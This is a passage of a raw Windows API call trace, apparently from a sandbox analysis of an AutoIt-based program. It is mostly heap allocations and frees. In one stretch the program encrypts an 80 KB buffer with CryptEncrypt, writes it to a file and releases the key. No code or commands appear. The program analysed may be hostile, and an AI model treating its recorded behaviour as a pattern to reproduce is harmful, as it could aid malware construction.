(in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0097.784] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0097.784] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0097.784] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0097.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0097.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.787] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.787] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0097.787] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0097.787] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0097.787] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0097.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0097.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0097.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0097.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0097.788] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0097.788] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.788] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0097.788] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.788] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca9a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0097.789] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x139d5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x139e0) returned 1 [0097.883] TranslateMessage (lpMsg=0x144eb54) returned 0 [0097.883] DispatchMessageW (lpMsg=0x144eb54) returned 0x0 [0097.883] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0097.883] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0097.883] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0097.883] CharLowerBuffW (in: lpsz="byte[80353]", cchLength=0xb | out: lpsz="byte[80353]") returned 0xb [0097.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0097.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0097.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0097.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0097.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x139e1) returned 0x49ad9e8 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d88 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0097.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0097.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0097.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0097.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x139d5) returned 0x49c13d8 [0097.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0097.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x139d5) returned 0x49d4db8 [0097.885] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.885] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0097.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0097.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0097.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0097.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43ca970 [0097.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0097.885] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49ad9e8*, pdwDataLen=0x144e538*=0x139d5, dwBufLen=0x139e0 | out: pbData=0x49ad9e8*, pdwDataLen=0x144e538*=0x139e0) returned 1 [0097.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0097.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0097.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0097.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0097.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0097.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0097.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0097.886] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0097.886] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0097.886] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.889] WriteFile (in: hFile=0x258, lpBuffer=0x45299f8*, nNumberOfBytesToWrite=0x139e0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x45299f8*, lpNumberOfBytesWritten=0x144ef3c*=0x139e0, lpOverlapped=0x0) returned 1 [0097.892] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0097.892] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.892] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0097.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0097.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0097.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0097.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0097.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca490, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0097.893] CryptDestroyKey (hKey=0x41ac540) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0097.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0097.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0097.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0097.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0097.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0097.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0097.893] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0097.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0097.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.893] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0097.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0097.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.893] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.893] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0097.894] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0097.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0097.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0097.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0097.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0097.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0097.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0097.894] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0097.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0097.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0097.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0097.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0097.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0097.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0097.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0097.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0097.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0097.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0097.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0097.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0097.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: 